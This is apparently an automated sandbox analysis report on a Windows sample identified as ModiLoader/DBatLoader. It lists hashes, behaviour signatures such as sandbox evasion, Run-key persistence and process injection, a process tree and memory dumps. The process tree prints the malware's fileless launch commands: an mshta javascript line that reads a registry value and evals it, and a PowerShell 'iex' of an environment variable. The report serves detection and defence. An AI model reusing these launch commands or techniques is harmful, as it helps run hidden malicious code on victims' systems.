Analysis

  • max time kernel
    149s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7-20240419-en
  • resource tags

    arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system
  • submitted
    15-05-2024 01:04

General

  • Target

    43e46699cadc74ba27d6327955947f32_JaffaCakes118.exe

  • Size

    238KB

  • MD5

    43e46699cadc74ba27d6327955947f32

  • SHA1

    1012cf38de5aebdee578f07dc66960bab39593bc

  • SHA256

    94eaf72f65df3f20f9279146c46c77fa320343c49fb2b0e5f77142e07e14513c

  • SHA512

    2b805fff0c1d223c35fc973b7b10a1418555b2fe6ee6c4d33ff4b8278d824edb609bc86617daac50fbf1864a2e8cd409e09c2d26c5d7c61c722c79884205484d

  • SSDEEP

    6144:J61GLobXB1BT74sjxQJHcvZCIGw2WHo69:Jfo9T740+HcbGqHo69

Malware Config

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
  • Looks for VirtualBox drivers on disk 2 TTPs 1 IoCs
  • ModiLoader Second Stage 53 IoCs
  • Adds policy Run key to start application 2 TTPs 2 IoCs
  • Looks for VMWare Tools registry key 2 TTPs 1 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Deletes itself 1 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 29 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\43e46699cadc74ba27d6327955947f32_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\43e46699cadc74ba27d6327955947f32_JaffaCakes118.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1320
    • C:\Users\Admin\AppData\Local\Temp\43e46699cadc74ba27d6327955947f32_JaffaCakes118.exe
      "C:\Users\Admin\AppData\Local\Temp\43e46699cadc74ba27d6327955947f32_JaffaCakes118.exe"
      2⤵
        PID:2968
    • C:\Windows\system32\mshta.exe
      "C:\Windows\system32\mshta.exe" javascript:NepesY70W="xNtml7";M1x1=new%20ActiveXObject("WScript.Shell");JIwK6hZ="So01";Ha1dJ=M1x1.RegRead("HKLM\\software\\Wow6432Node\\3oem0MM\\phrgGRZA");L8Z3nrIwR="wlB1NBm4";eval(Ha1dJ);hObED8on9="9";
      1⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2708
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:jxnaltig
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2612
        • C:\Windows\SysWOW64\regsvr32.exe
          regsvr32.exe
          3⤵
          • Looks for VirtualBox Guest Additions in registry
          • Looks for VirtualBox drivers on disk
          • Adds policy Run key to start application
          • Looks for VMWare Tools registry key
          • Checks BIOS information in registry
          • Deletes itself
          • Adds Run key to start application
          • Maps connected drives based on registry
          • Modifies Internet Explorer settings
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of WriteProcessMemory
          PID:2756
          • C:\Windows\SysWOW64\regsvr32.exe
            "C:\Windows\SysWOW64\regsvr32.exe"
            4⤵
              PID:1236

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/1236-47-0x0000000000250000-0x0000000000312000-memory.dmp
        Filesize

        776KB

      • memory/1236-48-0x0000000000250000-0x0000000000312000-memory.dmp
        Filesize

        776KB

      • memory/1236-49-0x0000000000250000-0x0000000000312000-memory.dmp
        Filesize

        776KB

      • memory/1236-50-0x0000000000250000-0x0000000000312000-memory.dmp
        Filesize

        776KB

      • memory/1236-46-0x0000000000250000-0x0000000000312000-memory.dmp
        Filesize

        776KB

      • memory/1236-44-0x00000000001C0000-0x00000000001C7000-memory.dmp
        Filesize

        28KB

      • memory/1236-45-0x0000000000250000-0x0000000000312000-memory.dmp
        Filesize

        776KB

      • memory/1236-42-0x00000000001C0000-0x00000000001C7000-memory.dmp
        Filesize

        28KB

      • memory/2612-24-0x00000000062D0000-0x0000000006392000-memory.dmp
        Filesize

        776KB

      • memory/2612-20-0x00000000062D0000-0x0000000006392000-memory.dmp
        Filesize

        776KB

      • memory/2756-32-0x00000000000D0000-0x0000000000192000-memory.dmp
        Filesize

        776KB

      • memory/2756-64-0x00000000000D0000-0x0000000000192000-memory.dmp
        Filesize

        776KB

      • memory/2756-26-0x00000000001C0000-0x00000000001C7000-memory.dmp
        Filesize

        28KB

      • memory/2756-27-0x00000000000D0000-0x0000000000192000-memory.dmp
        Filesize

        776KB

      • memory/2756-72-0x00000000000D0000-0x0000000000192000-memory.dmp
        Filesize

        776KB

      • memory/2756-28-0x00000000000D0000-0x0000000000192000-memory.dmp
        Filesize

        776KB

      • memory/2756-30-0x00000000000D0000-0x0000000000192000-memory.dmp
        Filesize

        776KB

      • memory/2756-31-0x00000000000D0000-0x0000000000192000-memory.dmp
        Filesize

        776KB

      • memory/2756-29-0x00000000000D0000-0x0000000000192000-memory.dmp
        Filesize

        776KB

      • memory/2756-39-0x00000000000D0000-0x0000000000192000-memory.dmp
        Filesize

        776KB

      • memory/2756-41-0x00000000000D0000-0x0000000000192000-memory.dmp
        Filesize

        776KB

      • memory/2756-40-0x00000000000D0000-0x0000000000192000-memory.dmp
        Filesize

        776KB

      • memory/2756-38-0x00000000000D0000-0x0000000000192000-memory.dmp
        Filesize

        776KB

      • memory/2756-37-0x00000000000D0000-0x0000000000192000-memory.dmp
        Filesize

        776KB

      • memory/2756-36-0x00000000000D0000-0x0000000000192000-memory.dmp
        Filesize

        776KB

      • memory/2756-35-0x00000000000D0000-0x0000000000192000-memory.dmp
        Filesize

        776KB

      • memory/2756-34-0x00000000000D0000-0x0000000000192000-memory.dmp
        Filesize

        776KB

      • memory/2756-33-0x00000000000D0000-0x0000000000192000-memory.dmp
        Filesize

        776KB

      • memory/2756-52-0x00000000000D0000-0x0000000000192000-memory.dmp
        Filesize

        776KB

      • memory/2756-53-0x00000000000D0000-0x0000000000192000-memory.dmp
        Filesize

        776KB

      • memory/2756-55-0x00000000000D0000-0x0000000000192000-memory.dmp
        Filesize

        776KB

      • memory/2756-56-0x00000000000D0000-0x0000000000192000-memory.dmp
        Filesize

        776KB

      • memory/2756-57-0x00000000000D0000-0x0000000000192000-memory.dmp
        Filesize

        776KB

      • memory/2756-58-0x00000000000D0000-0x0000000000192000-memory.dmp
        Filesize

        776KB

      • memory/2756-59-0x00000000000D0000-0x0000000000192000-memory.dmp
        Filesize

        776KB

      • memory/2756-60-0x00000000000D0000-0x0000000000192000-memory.dmp
        Filesize

        776KB

      • memory/2756-51-0x00000000000D0000-0x0000000000192000-memory.dmp
        Filesize

        776KB

      • memory/2756-67-0x00000000000D0000-0x0000000000192000-memory.dmp
        Filesize

        776KB

      • memory/2756-71-0x00000000000D0000-0x0000000000192000-memory.dmp
        Filesize

        776KB

      • memory/2756-70-0x00000000000D0000-0x0000000000192000-memory.dmp
        Filesize

        776KB

      • memory/2756-69-0x00000000000D0000-0x0000000000192000-memory.dmp
        Filesize

        776KB

      • memory/2756-68-0x00000000000D0000-0x0000000000192000-memory.dmp
        Filesize

        776KB

      • memory/2756-66-0x00000000000D0000-0x0000000000192000-memory.dmp
        Filesize

        776KB

      • memory/2756-65-0x00000000000D0000-0x0000000000192000-memory.dmp
        Filesize

        776KB

      • memory/2756-23-0x00000000001C0000-0x00000000001C7000-memory.dmp
        Filesize

        28KB

      • memory/2756-63-0x00000000000D0000-0x0000000000192000-memory.dmp
        Filesize

        776KB

      • memory/2756-62-0x00000000000D0000-0x0000000000192000-memory.dmp
        Filesize

        776KB

      • memory/2756-61-0x00000000000D0000-0x0000000000192000-memory.dmp
        Filesize

        776KB

      • memory/2968-4-0x0000000000400000-0x0000000000436000-memory.dmp
        Filesize

        216KB

      • memory/2968-5-0x0000000000400000-0x0000000000436000-memory.dmp
        Filesize

        216KB

      • memory/2968-10-0x0000000001C80000-0x0000000001D42000-memory.dmp
        Filesize

        776KB

      • memory/2968-9-0x0000000001C80000-0x0000000001D42000-memory.dmp
        Filesize

        776KB

      • memory/2968-8-0x0000000001C80000-0x0000000001D42000-memory.dmp
        Filesize

        776KB

      • memory/2968-7-0x0000000001C80000-0x0000000001D42000-memory.dmp
        Filesize

        776KB

      • memory/2968-6-0x0000000001C80000-0x0000000001D42000-memory.dmp
        Filesize

        776KB

      • memory/2968-11-0x0000000001C80000-0x0000000001D42000-memory.dmp
        Filesize

        776KB

      • memory/2968-2-0x0000000000400000-0x0000000000436000-memory.dmp
        Filesize

        216KB